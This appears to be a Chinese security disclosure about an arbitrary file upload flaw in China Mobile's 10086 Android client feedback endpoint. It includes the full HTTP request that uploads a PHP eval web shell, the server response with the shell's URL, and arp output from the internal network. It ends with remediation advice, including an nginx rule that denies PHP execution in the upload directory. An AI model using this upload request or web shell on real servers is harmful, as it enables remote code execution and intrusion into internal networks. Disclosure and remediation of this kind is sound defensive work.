中国移动手机营业厅GetShell可获取内网服务器权限下载

1.在10086官网上下载了个手机营业厅的Android客户端

 

http://www.10086.cn/cmccclient/andriod.html

2.客户端意见反馈处可上传图片，通过抓包进行提交发现可直接上传php脚本，服务端未进

行任何过滤。



POST请求：

 

POST /file.php HTTP/1.1

Content-Length: 244

Content-Type: multipart/form-data;

Host: clientdispatch.10086.cn:8080

Connection: closed

Accept-Encoding: gzip



--gHEBq3WtzAIOKRkmR5dzbKl7y-QvYj

Content-Disposition: form-data; name="file"; filename="1.php"

Content-Type: application/octet-stream

Content-Transfer-Encoding: binary



<?php @eval($_POST['xxxx']);?>

--gHEBq3WtzAIOKRkmR5dzbKl7y-QvYj--

返回响应包：



 

HTTP/1.1 200 OK

Server: nginx/1.4.4

Content-Type: text/html

Content-Length: 84

X-Powered-By: PHP/5.5.4

Connection: Keep-alive

Keep-Alive: timeout=15, max=100

Via: 1.1 ID-0001242737364450 uproxy-3



200|http://clientdispatch.10086.cn:8080/upload/bc10ba96f9cxxxxxxxx951.php

3.获取到webshell，并且是内网.



 

[/]$ arp

Address                  HWtype  HWaddress           Flags Mask            Iface

10.248.13.54             ether   00:15:17:4e:25:da   C                     bond0

10.248.13.35             ether   00:00:0c:07:ac:01   C                     bond0

10.248.13.50             ether   e4:1f:13:80:a2:37   C                     bond0

10.248.13.48             ether   e4:1f:13:80:a5:c7   C                     bond0

10.248.13.43             ether   e4:1f:13:80:a9:d5   C                     bond0

10.248.13.45             ether   e4:1f:13:80:a9:2d   C                     bond0

10.248.13.55             ether   00:15:17:4e:24:7e   C                     bond0

10.248.13.49             ether   e4:1f:13:80:a7:35   C                     bond0

10.248.13.47             ether   e4:1f:13:80:a2:c7   C                     bond0

修复方案：

1.判断图片格式及完整性



2.限制upload目录执行php脚本程序



nginx.conf server处添加：



location ~ /upload/.*.(php|php5)?$ {



deny all;



}